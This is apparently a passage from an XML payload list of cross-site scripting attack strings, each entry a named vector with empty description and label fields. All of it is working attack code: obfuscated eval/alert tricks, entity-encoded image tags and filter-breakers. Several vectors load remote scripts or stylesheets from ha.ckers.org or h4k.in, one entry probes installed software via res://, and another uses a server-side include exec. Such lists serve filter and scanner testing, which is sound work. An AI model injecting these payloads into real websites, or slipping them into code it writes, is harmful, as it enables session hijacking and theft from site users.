<attack>
<code>&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;</code>
<name>Non-Alpha/Non-Digit Part 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;/noscript&gt;
&lt;code onmouseover=a=eval;b=alert;a(b(/h/.source));&gt;MOVE MOUSE OVER THIS AREA&lt;/code&gt;</code>
<name>Noscript-breaker with mouseover</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>perl -e 'print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)&gt;&quot;;'&gt; out</code>
<name>Null Chars 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>perl -e 'print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;' &gt; out</code>
<name>Null Chars 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body onload=;;;;;;;;;;;_=alert;_(1);;;;</code>
<name>Obfuscated body onload vector</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=
0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=
0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=pa
rentNode;x.appendChild(i);</code>
<name>Obfuscated DOM element creation</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body &lt;body onload=;;;;;al:eval('al'+'ert(1)');;&gt;</code>
<name>Obfuscated double-body onload vector</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMGSRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;&lt;WBR&gt;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;&lt;WBR&gt;#116;&amp;#58;&amp;#97;
&amp;#108;&amp;#101;&amp;&lt;WBR&gt;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83&lt;WBR&gt;;&amp;#83;&amp;#39;&amp;#41&gt;</code>
<name>Obfuscated image tag using dec entities</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMGSRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28
&amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;</code>
<name>Obfuscated image tag using hex entities</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMGSRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058
&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;</code>
<name>Obfuscated image tag using long dec entities</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;
alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;</code>
<name>Obfuscated JS image source</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>(1?(1?{a:1?&quot;&quot;[1?&quot;ev\a\l&quot;:0](1?&quot;\a\lert&quot;:0):0}:0).a:0)[1?&quot;\c\a\l\l&quot;:0](content,1?&quot;x\s\s&quot;:0)</code>
<name>Obfuscated name trigger for Firefox</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body/s/onload=x={doc:parent.document};x.doc.writeln(1)</code>
<name>Obfuscated onload attribute variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body/””$/onload=x={doc:parent['document']};x.doc.writeln(1)</code>
<name>Obfuscated onload attribute variant 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body/""$/onload=x={doc:parent['document']};x.doc.writeln(1)</code>
<name>Obfuscated onload attribute variant 3</name>
<desc>(ah: added 05-dec-11)</desc>
<label></label>
</attack>
<attack>
<code>123[''+&lt;_&gt;ev&lt;/_&gt;+&lt;_&gt;al&lt;/_&gt;](''+&lt;_&gt;aler&lt;/_&gt;+&lt;_&gt;t&lt;/_&gt;+&lt;_&gt;(1)&lt;/_&gt;);</code>
<name>Obfuscated XML predicate vector variation 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=&lt;s&gt;evalalerta(1)a&lt;/s&gt;,s2=&lt;s&gt;&lt;/s&gt;+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:
0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/
s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/
s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:
0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:
0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)</code>
<name>Obfuscated XML predicate vector variation 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>o={x:''+&lt;s&gt;eva&lt;/s&gt;+&lt;s&gt;l&lt;/s&gt;,y:''+&lt;s&gt;aler&lt;/s&gt;+&lt;s&gt;t&lt;/s&gt;+&lt;s&gt;(1)&lt;/
s&gt;};function f() { 0[this.x](this.y) }f.call(o);</code>
<name>Obfuscated XML predicate vector variation 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___)</code>
<name>Obfuscated XSS variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;</code>
<name>OBJECT</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;</code>
<name>OBJECT w/Embedded XSS</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert('XSS');&quot;)&quot;;eval(a+b+c+d);</code>
<name>OBJECT w/Flash 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;</code>
<name>Octal Encoding</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>open(name)</code>
<name>Open string contained in name property</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;'); ?&gt;</code>
<name>PHP</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>alert(1)</code>
<name>Plain JavaScript alert</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;</code>
<name>Protocol Resolution Bypass</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;</code>
<name>Protocol resolution in script tags</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>0%0d%0a%00&lt;script src=//h4k.in&gt;</code>
<name>RegExp-based and native C filter vector</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)
'+'';
u1=s1+s2+s3;URL=u1</code>
<name>Remote IE URL overloading</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;</code>
<name>Remote Stylesheet 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;</code>
<name>Remote Stylesheet 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;</code>
<name>Remote Stylesheet 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;</code>
<name>Remote Stylesheet 4</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;</code>
<name>Removing CNAMEs</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Rename .js to .jpg</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210</code>
<name>res:// installed software probing</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;</code>
<name>SCRIPT w/Alert()</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</code>
<name>SCRIPT w/Char Code</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;</code>
<name>SCRIPT w/Source File</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1))</code>
<name>Self-contained XSS variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))</code>
<name>Self-contained XSS variant 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>eval.call(this,unescape.call(this,location))</code>
<name>Self-contained XSS variant 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b)))</code>
<name>Self-contained XSS variant 4</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a</code>
<name>Self-contained XSS variant 5</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>_=eval,__=unescape,___=document.URL,_(__(___))</code>
<name>Self-contained XSS variant 6</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)</code>
<name>Self-contained XSS variant 7</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))</code>
<name>Self-contained XSS variant 8</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod)</code>
<name>Self-contained XSS variant 9</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>with(location)with(hash)eval(substring(1))</code>
<name>Self-contained XSS with no dots</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot; &amp;#14; javascript:alert('XSS');&quot;&gt;</code>
<name>Spaces/Meta Chars</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;!--#exec cmd=&quot;/bin/echo '&lt;SCRIPT SRC'&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo '=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'&quot;--&gt;</code>
<name>SSI</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert('XSS');&lt;/STYLE&gt;</code>
<name>STYLE</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;style&gt;
body:after{
content: “\61\6c\65\72\74\28\31\29″
}
&lt;/style&gt;
&lt;script&gt;
eval(eval(document.styleSheets[0].cssRules[0].style.content))
&lt;/script&gt;</code>
<name>Style injection via content and double-eval</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;XSS STYLE=&quot;xss:expression(alert('XSS'))&quot;&gt;</code>
<name>STYLE w/Anonymous HTML</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert('XSS')&quot;)}&lt;/STYLE&gt;</code>
<name>STYLE w/background</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert('XSS')&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</code>
<name>STYLE w/background-image</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(&quot;XSS&quot;)';&lt;/STYLE&gt;</code>
<name>STYLE w/broken up JavaScript</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert('XSS'))&quot;&gt;</code>
<name>STYLE w/Comment</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>Stylesheet</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>}&lt;/style&gt;&lt;script&gt;a=eval;b=alert;a(b(/i/.source));&lt;/script&gt;</code>
<name>Style-breaker using obfuscated JavaScript</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&gt;&quot;'</code>
<name>Super basic HTML breaker 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=alert
a(0)</code>
<name>Super short XSS variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>A=alert;A(1)</code>
<name>Super short XSS variant 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;TABLE BACKGROUND=&quot;javascript:alert('XSS')&quot;&gt;&lt;/TABLE&gt;</code>
<name>TABLE</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert('XSS')&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;</code>
<name>TD</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;/textarea&gt;
&lt;code onmouseover=a=eval;b=alert;a(b(/g/.source));&gt;MOVE MOUSE OVER THIS AREA&lt;/code&gt;</code>
<name>Textarea-breaker with mouseover</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'</code>
<name>Unicode encoded script tags</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>http://aa&quot;&gt;&lt;script&gt;alert(123)&lt;/script&gt;</code>
<name>URL breaker for double quotes</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>http://aa'&gt;&lt;script&gt;alert(123)&lt;/script&gt;</code>
<name>URL breaker for single quotes</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;</code>
<name>URL encoded image source</name>
<desc></desc>
<label></label>
</attack>
</xss>